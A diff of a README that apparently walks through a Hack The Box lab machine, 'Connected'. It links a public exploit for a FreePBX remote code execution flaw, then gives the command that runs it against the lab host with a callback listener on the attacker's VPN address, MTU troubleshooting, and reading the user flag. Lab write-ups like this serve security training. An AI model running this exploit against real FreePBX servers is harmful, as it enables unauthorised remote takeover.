Collinformatics/HTB-Connected/README.md

 	https://github.com/0xEhab/FreePBX-CVE-2025-57819-RCE/blob/main/exploit.py

-Check Maximum Transmission Unit (MTU) Size:

-	$ ip link show tun0
-	... mtu 1500 ...

-- If this is too large it can cause packet transmission to fail.
-So if the exploit fails try decreasing the MTU value to 1200.

-	$ sudo ip link set dev tun0 mtu 1200

-Run the exploit:
+Run the exploit and be sure to include the flags for http mode and your vpn ip:

-	$ ./exploit.py --rhost "connected.htb" --rport 80 --http --lport 4444 --lhost 10.10.17.19
+	$ ./exploit.py --rhost "connected.htb" --rport 80 --http --lhost 10.10.17.19 --lport 4444

+- This may fail to connect, if so try it again.

-Now that were in the system lets get the user flag:
+Once we're in the system lets get the user flag:

 	$ cat /home/asterisk/user.txt